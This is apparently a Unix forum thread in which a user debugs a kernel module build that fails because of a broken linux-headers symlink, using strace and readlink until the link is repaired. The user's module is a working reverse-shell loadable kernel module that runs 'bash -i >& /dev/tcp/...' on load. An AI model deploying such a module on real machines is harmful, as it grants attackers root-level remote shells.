# Kernel module build can't find find symlink folders: Makefile: No such file or directory

Tags: kernel-modules, symlink, make

I have a simple kernel module that creates a reverse shell.
I created my Makefile like that:

```
cat << EOF > Makefile
obj-m +=${module_name}.o
all:
        make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
clean:
        make -C /lib/modules/$(uname -r)/build M=$(pwd) clean
EOF
```

But when I run the `make` command it fails:

```
root@ubuntu:~/moduletest# make
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-1045-aws'
make[1]: Makefile: No such file or directory
make[1]: *** No rule to make target 'Makefile'.  Stop.
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-1045-aws'
Makefile:3: recipe for target 'all' failed
make: *** [all] Error 2
```

I checked for the folder:

```
/lib/modules/5.4.0-1045-aws/build
```

But it seems to be a symlink that refers to other symlink:

```
/lib/modules/5.4.0-1045-aws/build -> /usr/src/linux-headers-5.4.0-1045-aws -> ../linux-aws-headers-5.4.0-1045/Makefile
```

The last file `../linux-aws-headers-5.4.0-1045/Makefile` is:

```
/usr/src/linux-aws-5.4-headers-5.4.0-1045/Makefile
```

Why the `make` command can't follow these links?

**Resources:**
My kernel module:

```
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/127.0.0.1/8000 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init bobo_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit bobo_exit(void) {
}
module_init(bobo_init);
module_exit(bobo_exit);
```

My Makefile after the creation of the variables:

```
obj-m +=bobo.o
all:
        make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev modules
clean:
        make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev clean
```

**Debug with Strace:**

I run the test:

```
strace -f -yy -q -e trace=%file -o make.strace make
```

Here are the logs where it searches and doesn't find:

```
15770 getcwd("/home/ubuntu/moduletest", 4096) = 24
15770 chdir("/lib/modules/5.4.0-1045-aws/build") = 0
15770 stat("/usr/include", {st_mode=S_IFDIR|0755, st_size=16384, ...}) = 0
15770 stat("/usr/gnu/include", 0x7ffc9d9319c0) = -1 ENOENT (No such file or directory)
15770 stat("/usr/local/include", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
15770 stat("/usr/include", {st_mode=S_IFDIR|0755, st_size=16384, ...}) = 0
15770 getcwd("/usr/src/linux-headers-5.4.0-1045-aws", 4096) = 38
15770 stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
15770 openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3</usr/src/linux-headers-5.4.0-1045-aws>
15770 openat(AT_FDCWD, "Makefile", O_RDONLY) = -1 ENOENT (No such file or directory)
```

**Debug with Strace -v:**

```
16954 getcwd("/home/ubuntu/moduletest", 4096) = 24
16954 chdir("/lib/modules/5.4.0-1045-aws/build") = 0
16954 stat("/usr/include", {st_dev=makedev(202, 1), st_ino=4731, st_mode=S_IFDIR|0755, st_nlink=33, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=32, st_size=16384, st_atime=1578850669 /* 2020-01-12T17:37:49.317948774+0000 */, st_atime_nsec=317948774, st_mtime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_mtime_nsec=734597829, st_ctime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_ctime_nsec=734597829}) = 0
16954 stat("/usr/gnu/include", 0x7ffeeaeac360) = -1 ENOENT (No such file or directory)
16954 stat("/usr/local/include", {st_dev=makedev(202, 1), st_ino=80156, st_mode=S_IFDIR|0755, st_nlink=2, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1578850475 /* 2020-01-12T17:34:35.054101307+0000 */, st_atime_nsec=54101307, st_mtime=1578850402 /* 2020-01-12T17:33:22.535948295+0000 */, st_mtime_nsec=535948295, st_ctime=1578850748 /* 2020-01-12T17:39:08.492615551+0000 */, st_ctime_nsec=492615551}) = 0
16954 stat("/usr/include", {st_dev=makedev(202, 1), st_ino=4731, st_mode=S_IFDIR|0755, st_nlink=33, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=32, st_size=16384, st_atime=1578850669 /* 2020-01-12T17:37:49.317948774+0000 */, st_atime_nsec=317948774, st_mtime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_mtime_nsec=734597829, st_ctime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_ctime_nsec=734597829}) = 0
16954 getcwd("/usr/src/linux-headers-5.4.0-1045-aws", 4096) = 38
16954 stat(".", {st_dev=makedev(202, 1), st_ino=1117295, st_mode=S_IFDIR|0755, st_nlink=7, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1644324103 /* 2022-02-08T12:41:43.401883198+0000 */, st_atime_nsec=401883198, st_mtime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_mtime_nsec=297502175, st_ctime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_ctime_nsec=297502175}) = 0
16954 openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3</usr/src/linux-headers-5.4.0-1045-aws>
16954 openat(AT_FDCWD, "Makefile", O_RDONLY) = -1 ENOENT (No such file or directory)
16954 openat(AT_FDCWD, "/usr/share/locale/C.UTF-8/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
```

I run:

```
root@ubuntu:~/moduletest# ls -ldi /usr/src/linux-headers-5.4.0-1045-aws/Makefile
1147184 lrwxrwxrwx 1 root root 40 Apr 13  2021 /usr/src/linux-headers-5.4.0-1045-aws/Makefile -> ../linux-aws-headers-5.4.0-1045/Makefile

root@ubuntu:~# ls -ldi /usr/src/linux-headers-5.4.0-1045-aws
1117295 drwxr-xr-x 7 root root 4096 Feb  7 09:28 /usr/src/linux-headers-5.4.0-1045-aws
root@ubuntu:~/moduletest# cat make.strace  | grep 7295
16954 stat(".", {st_dev=makedev(202, 1), st_ino=1117295, st_mode=S_IFDIR|0755, st_nlink=7, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1644324103 /* 2022-02-08T12:41:43.401883198+0000 */, st_atime_nsec=401883198, st_mtime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_mtime_nsec=297502175, st_ctime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_ctime_nsec=297502175}) = 0
root@ip-172-31-23-181:~/moduletest#
```

Comment: Try running make in `strace`: `strace -f -yy -q -e trace=%file -o make.strace make`. This will create an strace file called `make.strace` with all the files it opens. Trying looking there where's the file it tries to open. For instance, in my case I see: `21492 openat(AT_FDCWD, "Makefile", O_RDONLY) = 3</usr/src/linux-5.3.18-59.24-obj/x86_64/default/Makefile>`.  You might see some error there that would provide a hint or a general direction.

Comment: @aviro tnx, I added the logs to the answer (see last lines).  According to the logs it finds `/usr/src/linux-headers-5.4.0-1045-aws` call it with `getcwd`. Then it searches for `Makefile` and it doesn't find it. But when I run `ll /usr/src/linux-headers-5.4.0-1045-aws` I see the `Makefile` like that: `Makefile -> ../linux-aws-headers-5.4.0-1045/Makefile`.  It doesn't follow the symlink.

Comment: That's interesting. Please try to run: `wc -l '/usr/src/linux-headers-5.4.0-1045-aws/Makefile'` (the quotes are to ensure that the filename doesn't have any "invisible" characters). Also, please try to add `-v` flag to your strace command, that time the `stat` will show additional information such as the inode of the directory (`st_ino=....`), and you could compare it to to the inode of the folder (`ls -ldi <directory>`), and change the `-e` flag to `-e trace=%file,getdents64,getdents,fstat`, so we could also see additional things like directory listings.

Comment: @aviro I uploaded the logs in my answer. Regarding the command `wc -l ..` it prints `wc: /usr/src/linux-headers-5.4.0-1045-aws/Makefile: No such file or directory`. I tried to open it with `cat` but it also doesn't find it. But when I run `ll /usr/src/linux-headers-5.4.0-1045-aws/Makefile` it shows the link: `/usr/src/linux-headers-5.4.0-1045-aws/Makefile -> ../linux-aws-headers-5.4.0-1045/Makefile`

Comment: I run: ` ls -ldi /usr/src/linux-headers-5.4.0-1045-aws/Makefile` and it shows me `1147184` but in the logs I didn't find it.

Comment: First of all, you needed to run `ls -ldi` on the directory `/usr/src/linux-headers-5.4.0-1045-aws`, not on the file. But never mind that now, from what I see, this link is probably broken. Please run `readlink -f /usr/src/linux-headers-5.4.0-1045-aws/Makefile`, it will canonicalize the path and will show you the "real" path after all links are resolved. You'll probably see that this file doesn't exist.

Comment: @aviro first, thank you for your help. I run `readlink -f /usr/src/linux-headers-5.4.0-1045-aws/Makefile` it doesn't print anything. Like I pressed Enter without anycommand.

Comment: I also updated my answer with `ls -ldi` on the file and searching for the inode.

Comment: If `/usr/src/linux-headers-5.4.0-1045-aws/Makefile` is a link to `../linux-aws-headers-5.4.0-1045/Makefile` , it translates to `/usr/src/linux-headers-5.4.0-1045-aws/../linux-aws-headers-5.4.0-1045/Makefile` -> `/usr/src/linux-aws-headers-5.4.0-1045/Makefile`. Follow the link. Check if the folder `/usr/src/linux-aws-headers-5.4.0-1045` exists, and if it has a file called `Makefile`. If it's also a link, continue this step.

Comment: Oh OK, I understand now.
So last folder in the line: `/usr/src/linux-aws-headers-5.4.0-1045` doesn't exist.  

I confused because this folder exist:
`/usr/src/linux-aws-5.4-headers-5.4.0-1045/`.  
I thought this is the same one but it doesn't.  
So in the bottom line, the link is broken.  


I think the best way to solve it is to change the folder name from:  
`/usr/src/linux-aws-5.4-headers-5.4.0-1045` to `/usr/src/linux-aws-headers-5.4.0-1045`.
 
I thought to create new links with `ln -s` but I need to do it on specific files and this is too much work.

Comment: @aviro Yes, now it works after I changed the folder name! I appreciate your help, please submit it as an answer and I will accept.  Eventually I copied the folder like that: `cp -rL /usr/src/linux-aws-5.4-headers-5.4.0-1045 /usr/src/linux-aws-headers-5.4.0-1045`